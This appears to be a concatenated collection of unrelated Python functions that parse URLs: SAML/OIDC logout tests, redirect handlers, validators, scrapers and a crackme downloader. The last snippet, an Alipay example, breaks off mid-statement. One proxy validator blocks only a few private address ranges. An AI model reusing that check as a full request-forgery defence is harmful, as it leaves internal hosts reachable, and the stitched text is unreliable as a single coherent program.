def testProcessSLORequestInvalidValid(self): """ Tests the process_slo method of the OneLogin_Saml2_Auth class Case Invalid Logout Request """ settings_info = self.loadSettingsJSON() request_data = self.get_request() message = self.file_contents(join(self.data_path, 'logout_requests', 'logout_request_deflated.xml.base64')) request_data['get_data']['SAMLRequest'] = message auth = OneLogin_Saml2_Auth(request_data, old_settings=settings_info) target_url = auth.process_slo(True) parsed_query = parse_qs(urlparse(target_url)[4]) self.assertEqual(len(auth.get_errors()), 0) slo_url = settings_info['idp']['singleLogoutService']['url'] self.assertIn(slo_url, target_url) self.assertIn('SAMLResponse', parsed_query) #self.assertNotIn('RelayState', parsed_query) auth.set_strict(True) auth.process_slo(True) # Fail due destination missmatch self.assertEqual(auth.get_errors(), ['invalid_logout_request']) auth.set_strict(False) target_url_2 = auth.process_slo(True) parsed_query_2 = parse_qs(urlparse(target_url_2)[4]) self.assertEqual(len(auth.get_errors()), 0) slo_url = settings_info['idp']['singleLogoutService']['url'] self.assertIn(slo_url, target_url_2) self.assertIn('SAMLResponse', parsed_query_2)
def make_absolute_redirect_uri(self, uri): """Make absolute redirect URIs internal redirect uris, e.g. `/user/foo/oauth_handler` are allowed in jupyterhub, but oauthlib prohibits them. Add `$HOST` header to redirect_uri to make them acceptable. Currently unused in favor of monkeypatching oauthlib.is_absolute_uri to skip the check """ redirect_uri = self.get_argument('redirect_uri') if not redirect_uri or not redirect_uri.startswith('/'): return uri # make absolute local redirects full URLs # to satisfy oauthlib's absolute URI requirement redirect_uri = ( self.request.protocol + "://" + self.request.headers['Host'] + redirect_uri ) parsed_url = urlparse(uri) query_list = parse_qsl(parsed_url.query, keep_blank_values=True) for idx, item in enumerate(query_list): if item[0] == 'redirect_uri': query_list[idx] = ('redirect_uri', redirect_uri) break return urlunparse(urlparse(uri)._replace(query=urlencode(query_list)))
def Url(v): """Verify that the value is a URL.""" try: urlparse.urlparse(v) return v except: raise ValueError
def testLoginIsPassive(self): """ Tests the login method of the OneLogin_Saml2_Auth class Case Logout with no parameters. A AuthN Request is built with IsPassive and redirect executed """ settings_info = self.loadSettingsJSON() return_to = u'http://example.com/returnto' settings_info['idp']['singleSignOnService']['url'] auth = OneLogin_Saml2_Auth(self.get_request(), old_settings=settings_info) target_url = auth.login(return_to) parsed_query = parse_qs(urlparse(target_url)[4]) sso_url = settings_info['idp']['singleSignOnService']['url'] self.assertIn(sso_url, target_url) self.assertIn('SAMLRequest', parsed_query) request = compat.to_string(OneLogin_Saml2_Utils.decode_base64_and_inflate(parsed_query['SAMLRequest'][0])) self.assertNotIn('IsPassive="true"', request) auth_2 = OneLogin_Saml2_Auth(self.get_request(), old_settings=settings_info) target_url_2 = auth_2.login(return_to, False, False) parsed_query_2 = parse_qs(urlparse(target_url_2)[4]) self.assertIn(sso_url, target_url_2) self.assertIn('SAMLRequest', parsed_query_2) request_2 = compat.to_string(OneLogin_Saml2_Utils.decode_base64_and_inflate(parsed_query_2['SAMLRequest'][0])) self.assertNotIn('IsPassive="true"', request_2) auth_3 = OneLogin_Saml2_Auth(self.get_request(), old_settings=settings_info) target_url_3 = auth_3.login(return_to, False, True) parsed_query_3 = parse_qs(urlparse(target_url_3)[4]) self.assertIn(sso_url, target_url_3) self.assertIn('SAMLRequest', parsed_query_3) request_3 = compat.to_string(OneLogin_Saml2_Utils.decode_base64_and_inflate(parsed_query_3['SAMLRequest'][0])) self.assertIn('IsPassive="true"', request_3)
def _isswe(self, url): if re.search(r".se$", urlparse(url).netloc): return "sasong" elif re.search(r".dk$", urlparse(url).netloc): return "saeson" else: return "sesong"
def __init__(self, *args, **kwargs): self.__config = {} with KRB5Profile() as prof: # Load DNS setting self.__config["dns"] = prof.get_bool("libdefaults", "dns_fallback", default=True) if "dns_lookup_kdc" in dict(prof.section("libdefaults")): self.__config["dns"] = prof.get_bool("libdefaults", "dns_lookup_kdc", default=True) # Load all configured realms self.__config["realms"] = {} for realm, values in prof.section("realms"): rconf = self.__config["realms"].setdefault(realm, {}) for server, hostport in values: if server not in self.CONFIG_KEYS: continue parsed = urlparse.urlparse(hostport) if parsed.hostname is None: scheme = {'kdc': 'kerberos'}.get(server, 'kpasswd') parsed = urlparse.urlparse(scheme + "://" + hostport) if parsed.port is not None and server == 'admin_server': hostport = hostport.split(':', 1)[0] parsed = urlparse.urlparse("kpasswd://" + hostport) rconf.setdefault(server, []).append(parsed.geturl())
def check(self, domain): import requests from urllib.parse import urlparse score = 0 reason = "" nakedreq = requests.get("http://%s" % domain) nakedreqURL = urlparse(nakedreq.url) wwwreq = requests.get("http://www.%s" % domain) wwwreqURL = urlparse(wwwreq.url) if nakedreqURL.netloc == domain: score = 0 reason = "Naked domain (%s) does not redirect to www (but www does not redirect to naked)" % domain if wwwreqURL.netloc == domain: score = 1 reason = "www.%s redirects to %s" % (domain, domain) elif nakedreqURL.netloc == "www.%s" % domain: score = -1 reason = "Naked domain redirects to www." return { "score": score, "reason": reason }
def test_suomifi_logout_sp_request_invalid_token(django_client, django_user_model, fixed_saml_id): oidc_client = create_oidc_client() user = create_user(django_user_model) create_social_user(user) create_oidc_token(user, oidc_client) django_client.login(username=TEST_USER, password=TEST_PASSWORD) args = { 'id_token_hint': ID_TOKEN_JWT_INVALID, 'post_logout_redirect_uri': REDIRECT_URI, } logout_page_url = reverse('end-session') + '?{}'.format(urlencode(args)) logout_page_response = django_client.get(logout_page_url) # If the token hint is not recognized but the client has valid session we # still perform logout as we are able to deduce enough information to log # the client out. We are unable to remove the ID token and we do not have # a way to deduce the final redirect after Suomi.fi callback so the # RelayState parameter will be missing from the SAML request. assert Token.objects.count() == 1 assert logout_page_response.status_code == 302 suomifi_redirect = urlparse(logout_page_response.url) suomifi_query_params = parse_qs(suomifi_redirect.query) suomifi_saml_request = SAMLUtils.decode_base64_and_inflate(suomifi_query_params['SAMLRequest'][0]) expected_slo_url = urlparse(getattr(settings, 'SOCIAL_AUTH_SUOMIFI_ENABLED_IDPS')['suomifi']['logout_url']) expected_logout_request = load_file('suomifi_logout_request.xml') expected_logout_signature = load_file('suomifi_logout_without_relaystate_signature.b64').decode() assert suomifi_redirect[:3] == expected_slo_url[:3] assert suomifi_saml_request == expected_logout_request assert 'RelayState' not in suomifi_query_params assert suomifi_query_params['Signature'][0] == expected_logout_signature
def test_suomifi_idp_logout(django_client, fixed_saml_id): '''Suomi.fi use cases #4: receiving logout request, and #6: sending logout response''' create_oidc_client() args = { 'SAMLRequest': load_file('suomifi_idp_logout_request_encoded.b64').decode(), 'RelayState': RELAY_STATE, 'SigAlg': 'http://www.w3.org/2001/04/xmldsig-more#rsa-sha256', 'Signature': load_file('suomifi_idp_logout_signature.b64').decode() } callback_url = reverse('auth_backends:suomifi_logout_callback') + '?{}'.format(urlencode(args)) callback_response = django_client.get(callback_url) # IdP initiated logout request results in redirect to Suomi.fi SLO URL with # SAML response and RelayState from request. assert callback_response.status_code == 302 suomifi_redirect = urlparse(callback_response.url) suomifi_query_params = parse_qs(suomifi_redirect.query) suomifi_saml_response = SAMLUtils.decode_base64_and_inflate(suomifi_query_params['SAMLResponse'][0]) expected_slo_url = urlparse(getattr(settings, 'SOCIAL_AUTH_SUOMIFI_ENABLED_IDPS')['suomifi']['logout_url']) expected_logout_response = load_file('suomifi_idp_logout_response.xml') expected_logout_signature = load_file('suomifi_idp_logout_response_signature.b64').decode() assert suomifi_redirect[:3] == expected_slo_url[:3] assert suomifi_saml_response == expected_logout_response assert suomifi_query_params['RelayState'][0] == RELAY_STATE assert suomifi_query_params['Signature'][0] == expected_logout_signature
def status(): with open(PROJECTS_FILE) as file: projects = json.load(file) try: for project in projects: _, host, path, _, _, _ = urlparse(project['travis url']) api_url = 'https://api.{host}/repos{path}'.format(**locals()) resp = get(api_url) # See if the Github URL has moved. if resp.status_code == 404: github_url = 'https://github.com{path}'.format(**locals()) resp = get(github_url) if resp.status_code == 200: _, _, github_path, _, _, _ = urlparse(resp.url) if github_path != path: message = 'Error in {guid}: {path} has moved to {github_path}' kwargs = dict(guid=project['guid'], **locals()) raise Exception(message.format(**kwargs)) if resp.status_code != 200: message = 'Missing {guid}: no {travis url}' raise Exception(message.format(**project)) except Exception as e: status = str(e) else: status = 'ok' return jsonify(dict(status=status, updated=int(time()), dependencies=['Travis', 'Github'], resources={}))
def test_suomifi_logout_sp_request(django_client, django_user_model, fixed_saml_id): '''Suomi.fi use case #3: sending logout request''' oidc_client = create_oidc_client() user = create_user(django_user_model) create_social_user(user) create_oidc_token(user, oidc_client) django_client.login(username=TEST_USER, password=TEST_PASSWORD) args = { 'id_token_hint': ID_TOKEN_JWT, 'post_logout_redirect_uri': REDIRECT_URI, } logout_page_url = reverse('end-session') + '?{}'.format(urlencode(args)) logout_page_response = django_client.get(logout_page_url) # Logout request results in redirect to Suomi.fi with a SAML message in # query parameters. The OIDC token for the user is deleted. assert Token.objects.count() == 0 assert logout_page_response.status_code == 302 suomifi_redirect = urlparse(logout_page_response.url) suomifi_query_params = parse_qs(suomifi_redirect.query) suomifi_saml_request = SAMLUtils.decode_base64_and_inflate(suomifi_query_params['SAMLRequest'][0]) expected_slo_url = urlparse(getattr(settings, 'SOCIAL_AUTH_SUOMIFI_ENABLED_IDPS')['suomifi']['logout_url']) expected_logout_request = load_file('suomifi_logout_request.xml') expected_logout_signature = load_file('suomifi_logout_signature.b64').decode() assert suomifi_redirect[:3] == expected_slo_url[:3] assert suomifi_saml_request == expected_logout_request assert suomifi_query_params['RelayState'][0] == '{"cli": "test_client", "idx": 0}' assert suomifi_query_params['Signature'][0] == expected_logout_signature
def get_referrer(self, oldurl, newurl): """ Get the referrer to send when doing a request. If we should not send a referrer, it will return None. Reference: https://en.wikipedia.org/wiki/HTTP_referer :param oldurl: Current absolute URL :type oldurl: str or None :param newurl: Target absolute URL :type newurl: str :rtype: str or None """ if oldurl is None: return None old = urlparse(oldurl) new = urlparse(newurl) # Do not leak secure URLs to insecure URLs if old.scheme == 'https' and new.scheme != 'https': return None # Reloading the page. Usually no referrer. if oldurl == newurl: return None # TODO maybe implement some *optional* privacy features: # * do not leak referrer to other domains (often breaks websites) # * send a fake referrer (root of the current domain) # * never send the referrer # Inspired by the RefControl Firefox addon. return oldurl
def validate_url(url: str): try: urlparse(url) except ValueError as ex: raise AssertionError( "Couldn't parse given value `{}` as an URL".format(url) ) from ex
def relative_uri(source, target): """ Make a relative URI from source to target. """ su = urlparse.urlparse(source) tu = urlparse.urlparse(target) extra = list(tu[3:]) relative = None if tu[0] == '' and tu[1] == '': if tu[2] == su[2]: relative = '' elif not tu[2].startswith('/'): relative = tu[2] elif su[0:2] != tu[0:2]: return target if relative is None: if tu[2] == su[2]: relative = '' else: relative = os.path.relpath(tu[2], os.path.dirname(su[2])) if relative == '.': relative = '' relative = urlparse.urlunparse(["", "", relative] + extra) return relative
def find_local_path(self, uri, default_destination=None, netloc=False, infix=""): base_uri = uri destination = None path = None postfix = None local_path = None while destination is None: try: destination = self.mappings[base_uri] postfix = uri[len(base_uri) + 1:] except KeyError: if path == "": break else: (base_uri, path) = DestinationMap.shorten(base_uri) if destination is None: destination = default_destination if destination is None and netloc: destination = urlparse(uri).netloc l = len(urlparse(uri).scheme) + len(destination) postfix = uri[l + 4:] if destination is not None and not os.path.isabs(destination): destination = os.path.join(self.root_folder, destination) if destination is not None and postfix is not None: local_path = os.path.join(destination, infix, postfix) return base_uri, local_path
def get_new_command(command, settings): url = command.script.split()[1] if '/' in command.script: return 'whois ' + urlparse(url).netloc elif '.' in command.script: return 'whois ' + '.'.join(urlparse(url).path.split('.')[1:])
def url(value): try: url_str = str(value) urlparse(url_str) return url_str except Exception as err: raise ValueError("Invalid URL `{0}`: {1}".format(value, err))
def isArticle(self, url, soup): # Function determines if given url opens an news article articleURL = url article = False netloc = urlparse(url).netloc path = urlparse(url).path if netloc == 'www.ratopati.com': cond1 = re.match(r'/\d\d\d\d/\d\d/\d\d/\d\d\d\d\d\d.html', path) is not None div = soup.find('div', {'id': 'sing_cont'}) cond2 = div is not None if (cond1 and cond2) is True: articleTitle = div.h2.text.encode('utf-8', 'ignore') articleDatelst = path.split('.')[0].split('/')[1:-1] articleDate = datetime(int(articleDatelst[0]),int(articleDatelst[1]),int(articleDatelst[2])) articleURL = url article = True if netloc == 'www.setopati.com': pass else: pass if article is True: return [True, articleTitle, articleDate, articleURL] else: return [False]
def _line(self, l): # {{{ if DEBUG > 4: log('Debug: Received line: %s' % l) if self.address is not None: if not l.strip(): self._handle_headers() return try: key, value = l.split(':', 1) except ValueError: log('Invalid header line: %s' % l) return self.headers[key.lower()] = value.strip() return else: try: self.method, url, self.standard = l.split() for prefix in self.proxy: if url.startswith('/' + prefix + '/') or url == '/' + prefix: self.prefix = '/' + prefix break else: self.prefix = '' address = urlparse(url) path = address.path[len(self.prefix):] or '/' self.url = path + url[len(address.path):] self.address = urlparse(self.url) self.query = parse_qs(self.address.query) except: traceback.print_exc() self.server.reply(self, 400) self.socket.close() return
def test_spawn_redirect(app, io_loop): name = 'wash' cookies = app.login_user(name) u = app.users[orm.User.find(app.db, name)] # ensure wash's server isn't running: r = api_request(app, 'users', name, 'server', method='delete', cookies=cookies) r.raise_for_status() status = io_loop.run_sync(u.spawner.poll) assert status is not None # test spawn page when no server is running r = get_page('spawn', app, cookies=cookies) r.raise_for_status() print(urlparse(r.url)) path = urlparse(r.url).path assert path == ujoin(app.base_url, 'user/%s' % name) # should have started server status = io_loop.run_sync(u.spawner.poll) assert status is None # test spawn page when server is already running (just redirect) r = get_page('spawn', app, cookies=cookies) r.raise_for_status() print(urlparse(r.url)) path = urlparse(r.url).path assert path == ujoin(app.base_url, '/user/%s' % name)
def _do_redirect(self, response): request = response.request # done with current response url = response.headers.get('location') # Handle redirection without scheme (see: RFC 1808 Section 4) if url.startswith('//'): parsed_rurl = urlparse(request.full_url) url = '%s:%s' % (parsed_rurl.scheme, url) # Facilitate non-RFC2616-compliant 'location' headers # (e.g. '/path/to/resource' instead of # 'http://domain.tld/path/to/resource') if not urlparse(url).netloc: url = urljoin(request.full_url, # Compliant with RFC3986, we percent # encode the url. requote_uri(url)) history = request.history if history and len(history) >= request.max_redirects: raise TooManyRedirects(response) params = request.inp_params.copy() params['history'] = copy(history) if history else [] params['history'].append(response) if response.status_code == 303: method = 'GET' params.pop('data', None) params.pop('files', None) else: method = request.method response.request_again = request_again(method, url, params) return response
def parse( target, max_level, stay_local, search_string, level=1, parsed_links={}): if (level > max_level): return parsed_links print("Parsing [level %d] - %s" % (level, target)) try: hostname = urlparse(target)[1] tree = lxml.html.parse(target) root = tree.getroot() text = ''.join(root.itertext()) parsed_links[target] = True if search_string.search(text) else False root.make_links_absolute(root.base) for link in root.iterlinks(): href = link[2] if (stay_local and urlparse(href)[1] != hostname): continue if (href not in parsed_links): parse(href, max_level, stay_local, search_string, level + 1, parsed_links) except Exception as e: print("Couldn't parse the target {}: {!s}".format(target, e)) return parsed_links
def match_allowed_origin(self, parsed_origin, pattern): """ Returns ``True`` if the origin is either an exact match or a match to the wildcard pattern. Compares scheme, domain, port of origin and pattern. Any pattern can be begins with a scheme. After the scheme must be a domain, or just domain without scheme. Any domain beginning with a period corresponds to the domain and all its subdomains (for example, ``.example.com`` ``example.com`` and any subdomain). Also with scheme (for example, ``http://.example.com`` ``http://exapmple.com``). After the domain there must be a port, but it can be omitted. Note. This function assumes that the given origin has a schema, domain and port, or only domain. Port is optional. """ # Get ResultParse object parsed_pattern = urlparse(pattern.lower(), scheme=None) if parsed_pattern.scheme is None: pattern_hostname = urlparse("//" + pattern).hostname or pattern return is_same_domain(parsed_origin.hostname, pattern_hostname) # Get origin.port or default ports for origin or None origin_port = self.get_origin_port(parsed_origin) # Get pattern.port or default ports for pattern or None pattern_port = self.get_origin_port(parsed_pattern) # Compares hostname, scheme, ports of pattern and origin if parsed_pattern.scheme == parsed_origin.scheme and origin_port == pattern_port \ and is_same_domain(parsed_origin.hostname, parsed_pattern.hostname): return True return False
def scrape(tracker, hashes): """ Returns the list of seeds, peers and downloads a torrent info_hash has, according to the specified tracker Args: tracker (str): The announce url for a tracker, usually taken directly from the torrent metadata hashes (list): A list of torrent info_hash's to query the tracker for Returns: A dict of dicts. The key is the torrent info_hash's from the 'hashes' parameter, and the value is a dict containing "seeds", "peers" and "complete". Eg: { "2d88e693eda7edf3c1fd0c48e8b99b8fd5a820b2" : { "seeds" : "34", "peers" : "189", "complete" : "10" }, "8929b29b83736ae650ee8152789559355275bd5c" : { "seeds" : "12", "peers" : "0", "complete" : "290" } } """ tracker = tracker.lower() parsed = urlparse(tracker) if parsed.scheme == "udp": return scrape_udp(parsed, hashes) if parsed.scheme in ["http", "https"]: if "announce" not in tracker: raise RuntimeError("%s doesnt support scrape" % tracker) parsed = urlparse(tracker.replace("announce", "scrape")) return scrape_http(parsed, hashes) raise RuntimeError("Unknown tracker scheme: %s" % parsed.scheme)
def check_url_redirection(self, url_record): """ Checks redirection in URL and saves new domains, if any """ current_url = url_record['url'] recursive, url = self._check_redirection(current_url) url_record['final_url'] = url if recursive: print(' This is a recursive redirect. Action: Skipped!') url_record['redirected'] = True url_record['recursive'] = True else: url_record['recursive'] = False if url == current_url: url_record['redirected'] = False else: url_record['redirected'] = True domain1 = _extract_domain(current_url) domain2 = _extract_domain(url) if urlparse(domain1).netloc == urlparse(domain2).netloc: url_record['same_domain'] = True else: url_record['same_domain'] = False if domain2 not in self.new_domains: # Make sure the domain is not in the blacklist if urlparse(domain2).netloc not in self.blacklist: # Make sure that the URL is that of a web archive snapshot if '://web.archive.org/web/' in url: print(' New domain found: %s' % domain2) self.new_domains.append(domain2) return url_record
def create_graphml(dists_triu, data, time_max=164, sim_min=0.8): size = dists_triu.shape[0] G = nx.DiGraph() G.add_node(0, step=0, date=0,domain=urlparse(data[0]['link']).netloc) date_init = data[0]['published'] outs = [] for i in range(1, size): pub_i = data[i]['published'] column = list(dists_triu[:,i]) pos = get_pos(data, pub_i, column, time_max, sim_min, outs) if pos != None: if pos not in G.nodes(): domain_1 = urlparse(data[pos]['link']).netloc date_1 = create_date(date_init, data[pos]['published'], 5) G.add_node(pos, date=date_1, domain=domain_1) if i not in G.nodes(): domain_2 = urlparse(data[i]['link']).netloc date_2 = create_date(date_init, pub_i, 5) G.add_node(i, date=date_2, domain=domain_2) G.add_edge(pos, i) else: outs.append(i) return G
def fix_content(content): """ Parse article content to rewrite it for a better reader experience """ parsed_content = BeautifulSoup(content, "html.parser") CAMO_KEY = settings.CAMO_KEY for img in parsed_content.find_all('img'): if img.get('src') and CAMO_KEY and urlparse(img['src']).scheme != 'https': img['src'] = get_camo_url(img['src']) del img['srcset'] del img['sizes'] img['class'] = img.get('class', []) + ['img-responsive'] for div in parsed_content.find_all('div'): del div['style'] for table in parsed_content.find_all('table'): table['class'] = table.get('class', []) + ['table-responsive'] for a in parsed_content.find_all('a'): a['target'] = '_blank' for iframe in parsed_content.find_all('iframe'): url = urlparse(iframe['src']) if url.scheme != 'https' and url.netloc in SSLIFY_HOST_LIST: iframe['src'] = url._replace(scheme='https').geturl() return str(parsed_content)
def __init__(self, bucket_key, bucket_name=None, wildcard_match=False, aws_conn_id='aws_default', verify=None, *args, **kwargs): super().__init__(*args, **kwargs) # Parse if bucket_name is None: parsed_url = urlparse(bucket_key) if parsed_url.netloc == '': raise AirflowException('Please provide a bucket_name') else: bucket_name = parsed_url.netloc bucket_key = parsed_url.path.lstrip('/') else: parsed_url = urlparse(bucket_key) if parsed_url.scheme != '' or parsed_url.netloc != '': raise AirflowException('If bucket_name is provided, bucket_key' + ' should be relative path from root' + ' level, rather than a full s3:// url') self.bucket_name = bucket_name self.bucket_key = bucket_key self.wildcard_match = wildcard_match self.aws_conn_id = aws_conn_id self.verify = verify
def validate_url(request): assert request.method == "GET" assert request.is_ajax() url = request.GET.get('url') assert url try: URLValidator(url) except ValidationError: raise AssertionError() assert 'HTTP_REFERER' in request.META referer = urlparse(request.META.get('HTTP_REFERER')) toproxy = urlparse(url) local = urlparse(settings.SITE_URL) assert toproxy.hostname assert referer.hostname == local.hostname assert toproxy.hostname != "localhost" assert toproxy.netloc != local.netloc try: # clean this when in python 3.4 ipaddress = socket.gethostbyname(toproxy.hostname) except: raise AssertionError() assert not ipaddress.startswith('127.') assert not ipaddress.startswith('192.168.') return url
def _is_latest(js_option, request): """ Return whether we should serve latest untranspiled code. Set according to user's preference and URL override. """ import hass_frontend if request is None: return js_option == 'latest' # latest in query if 'latest' in request.query or ( request.headers.get('Referer') and 'latest' in urlparse(request.headers['Referer']).query): return True # es5 in query if 'es5' in request.query or ( request.headers.get('Referer') and 'es5' in urlparse(request.headers['Referer']).query): return False # non-auto option in config if js_option != 'auto': return js_option == 'latest' useragent = request.headers.get('User-Agent') return useragent and hass_frontend.version(useragent)
def network_location(url): o = urlparse(url,scheme='http') o = o.netloc return o
def _extract_site_name(url): parsed = urlparse(url) domain = '{uri.netloc}'.format(uri=parsed) return domain
def parse_blob_url(url): from urllib import parse url_path = parse.urlparse(url) parts = url_path.path.lstrip('/').split('/', 1) return url_path.netloc, tuple(parts)
def __init__(self): try: from urllib.parse import urlparse except ImportError: from urlparse import urlparse # argv[0] can contain the entire path, so we limit ourselves to the base url pid = urlparse(argv[0]) self.pluginid = '{}://{}/'.format(pid.scheme, pid.netloc) self.pluginhandle = int( argv[1]) if (1 < len(argv)) and self.pluginid else -1 self._globals['monitor'] = xbmc.Monitor() self._globals['addon'] = xbmcaddon.Addon() self._globals['dialog'] = xbmcgui.Dialog() # self._globals['dialogprogress'] = xbmcgui.DialogProgress() self._globals['hasExtRC'] = xbmc.getCondVisibility( 'System.HasAddon(script.chromium_remotecontrol)') self._globals['DATA_PATH'] = py2_decode( xbmc.translatePath(self.addon.getAddonInfo('profile'))) self._globals['CONFIG_PATH'] = OSPJoin(self._globals['DATA_PATH'], 'config') self._globals['HOME_PATH'] = py2_decode( xbmc.translatePath('special://home')) self._globals['PLUGIN_PATH'] = py2_decode( self._globals['addon'].getAddonInfo('path')) # With main PATHs configured, we initialise the get/write path attributes # and generate/retrieve the device ID getConfig.configPath = self._globals['CONFIG_PATH'] writeConfig.configPath = self._globals['CONFIG_PATH'] self._globals['deviceID'] = self.genID() self._globals['__plugin__'] = self._globals['addon'].getAddonInfo( 'name') self._globals['__authors__'] = self._globals['addon'].getAddonInfo( 'author') self._globals['__credits__'] = "" self._globals['__version__'] = self._globals['addon'].getAddonInfo( 'version') # OS Detection if xbmc.getCondVisibility('system.platform.windows'): self._globals['platform'] |= self.OS_WINDOWS if xbmc.getCondVisibility('system.platform.linux'): self._globals['platform'] |= self.OS_LINUX if xbmc.getCondVisibility('system.platform.osx'): self._globals['platform'] |= self.OS_OSX if xbmc.getCondVisibility('system.platform.android'): self._globals['platform'] |= self.OS_ANDROID if (xbmcvfs.exists('/etc/os-release')) and ( 'libreelec' in xbmcvfs.File('/etc/os-release').read()): self._globals['platform'] |= self.OS_LE # Save the language code for HTTP requests and set the locale for l10n loc = getdefaultlocale()[0] userAcceptLanguages = 'en-gb{}, en;q=0.5' self._globals['userAcceptLanguages'] = userAcceptLanguages.format( '') if not loc else '{}, {}'.format( loc.lower().replace('_', '-'), userAcceptLanguages.format(';q=0.75')) self._globals['CONTEXTMENU_MULTIUSER'] = [ (getString(30130, self._globals['addon']).split('…')[0], 'RunPlugin({}?mode=LogIn)'.format(self.pluginid)), (getString(30131, self._globals['addon']).split('…')[0], 'RunPlugin({}?mode=removeUser)'.format(self.pluginid)), (getString(30132, self._globals['addon']), 'RunPlugin({}?mode=renameUser)'.format(self.pluginid)) ]
def _file_url_to_local_url(self, url: str) -> str: parsed = urlparse(url) if not parsed.path.startswith("/packages"): raise RuntimeError(f"Got invalid download URL: {url}") prefix = self.root_uri if self.root_uri else "../.." return prefix + parsed.path
import sys import wget import zipfile import subprocess from urllib.parse import urlparse password = b'crackmes.one' if __name__ == '__main__': if len(sys.argv) == 2: url = sys.argv[1] else: url = input('enter url : ') u_parse = urlparse(url) token = u_parse.path.split('/')[-1] print(f'downloading "{token}.zip"... ', end='') file_name = wget.download( f'https://crackmes.one/static/crackme/{token}.zip', out=f'zips/{token}.zip', bar=None) print('\tdone') print('extracting files... ', end='') z_file = zipfile.ZipFile(file_name) z_file.setpassword(password) z_file.extractall()
def __init__(self, filename): filename = filename.strip() if not urlparse(filename).scheme: filename = 'http://' + filename super().__init__(filename)
async def data_extraction_for_web_baidu(client, html): with async_timeout.timeout(20): try: # 获取一段h5 url = html.select('h3.t a')[0].get('href', None) # 获取href标签内容 - # 首先 - html.select('h3.t a')[0] # < a # data - click = "{ # 'F': '778317EA', # 'F1': '9D73F1E4', # 'F2': '4DA6DD6B', # 'F3': '54E5363F', # 'T': '1497109660', # 'y': 'A7BFAFBF' # # }" href=" # http: // www.baidu.com / link?url = w2bV3ST9FFL3f39PGG6VUhT10aqZ1GNZrhWa5BIclVak7hYZEh1wGiTsvrGYJgXJEAPNoPfS7x0X4xK9nLDzJK # " target=" # _blank # "><em>择天记</em>,<em>择天记</em>最新章节,<em>择天记</em>无弹窗,88读书网</a> # 然后 - get('href', None) # http: // www.baidu.com / link?url = w2bV3ST9FFL3f39PGG6VUhT10aqZ1GNZrhWa5BIclVak7hYZEh1wGiTsvrGYJgXJEAPNoPfS7x0X4xK9nLDzJK real_url = await get_real_url(client=client, url=url) if url else None if real_url: netloc = urlparse(str(real_url)).netloc # >> > import urlparse # >> > url = urlparse.urlparse('http://www.baidu.com/index.php?username=guol') # >> > print # url # ParseResult(scheme='http', netloc='www.baidu.com', path='/index.php', params='', query='username=guol', # fragment='') # >> > print # url.netloc # www.baidu.com if 'baidu' in str(real_url) or netloc in BLACK_DOMAIN: return None #print('--------------------') #print(RULES.keys()) is_parse = 1 if netloc in RULES.keys() else 0 title = html.select('h3.t a')[0].get_text() # time = re.findall(r'\d+-\d+-\d+', source) # time = time[0] if time else None timestamp = 0 time = "" # if time: # try: # time_list = [int(i) for i in time.split('-')] # timestamp = arrow.get(time_list[0], time_list[1], time_list[2]).timestamp # except Exception as e: # LOGGER.exception(e) # timestamp = 0 return { 'title': title, 'url': str(real_url).replace('index.html', ''), 'time': time, 'is_parse': is_parse, 'timestamp': timestamp, 'netloc': netloc } else: return None except Exception as e: LOGGER.exception(e) return None
def make_button(i, url): return '%d - %s' % (i + 1, urlparse(url).hostname)
def extract_params(fileName, paramsDict): params = urlparse(paramsDict['sourceUrl']) path = os.path.split(params.path)[-1] return list(os.path.split(fileName)) + [path]
def conform(srcjson, destdir, extras): ''' Python wrapper for openaddresses-conform. Return a ConformResult object: processed: URL of processed data CSV path: local path to CSV of processed data geometry_type: typically Point or Polygon elapsed: elapsed time as timedelta object output: subprocess output as string Creates and destroys a subdirectory in destdir. ''' start = datetime.now() source, _ = splitext(basename(srcjson)) workdir = mkdtemp(prefix='conform-', dir=destdir) with open(srcjson, 'r') as src_file: data = json.load(src_file) data.update(extras) # # The cached data will be a local path. # scheme, _, cache_path, _, _, _ = urlparse(extras.get('cache', '')) if scheme == 'file': copy(cache_path, workdir) source_urls = data.get('cache') if not isinstance(source_urls, list): source_urls = [source_urls] task1 = URLDownloadTask(source) downloaded_path = task1.download(source_urls, workdir) _L.info("Downloaded to %s", downloaded_path) task2 = DecompressionTask.from_type_string(data.get('compression')) names = elaborate_filenames(data.get('conform', {}).get('file', None)) decompressed_paths = task2.decompress(downloaded_path, workdir, names) _L.info("Decompressed to %d files", len(decompressed_paths)) task3 = ExcerptDataTask() try: conform = data.get('conform', {}) data_sample, geometry_type = task3.excerpt(decompressed_paths, workdir, conform) _L.info("Sampled %d records", len(data_sample)) except Exception as e: _L.warning("Error doing excerpt; skipping", exc_info=True) data_sample = None geometry_type = None task4 = ConvertToCsvTask() try: csv_path, addr_count = task4.convert(data, decompressed_paths, workdir) _L.info("Converted to %s with %d addresses", csv_path, addr_count) except Exception as e: _L.warning("Error doing conform; skipping", exc_info=True) csv_path, addr_count = None, 0 out_path = None if csv_path is not None and exists(csv_path): move(csv_path, join(destdir, 'out.csv')) out_path = realpath(join(destdir, 'out.csv')) rmtree(workdir) sharealike_flag = conform_sharealike(data.get('license')) attr_flag, attr_name = conform_attribution(data.get('license'), data.get('attribution')) return ConformResult(data.get('processed', None), data_sample, data.get('website'), conform_license(data.get('license')), geometry_type, addr_count, out_path, datetime.now() - start, sharealike_flag, attr_flag, attr_name)
if signer.verify(digest, decodebytes(signature.encode("utf8"))): return True return False def verify(self, data, signature): if "sign_type" in data: sign_type = data.pop("sign_type") # 排序后的字符串 unsigned_items = self.ordered_data(data) message = "&".join(u"{}={}".format(k, v) for k, v in unsigned_items) return self._verify(message, signature) if __name__ == "__main__": return_url = 'https://openapi.alipay.com/gateway.do?timestamp=2013-01-01 08:08:08&method=alipay.trade.page.pay&app_id=16388&sign_type=RSA2&sign=ERITJKEIJKJHKKKKKKKHJEREEEEEEEEEEE&version=1.0&charset=GBK&biz_content=AlipayTradePageCreateandpayModel' o = urlparse(return_url) query = parse_qs(o.query) processed_query = {} ali_sign = query.pop("sign")[0] # 测试用例 alipay = AliPay( # 沙箱里面的appid值 appid="2021000116669532", #notify_url是异步的url app_notify_url="http://39.103.172.179:8000/alipay/return/", # 我们自己商户的密钥 app_private_key_path="../trade/keys/private_key_2048.txt", # 支付宝的公钥 alipay_public_key_path="../trade/keys/ali_public_key_2048.txt", # 支付宝的公钥,验证支付宝回传消息使用,不是你自己的公钥,
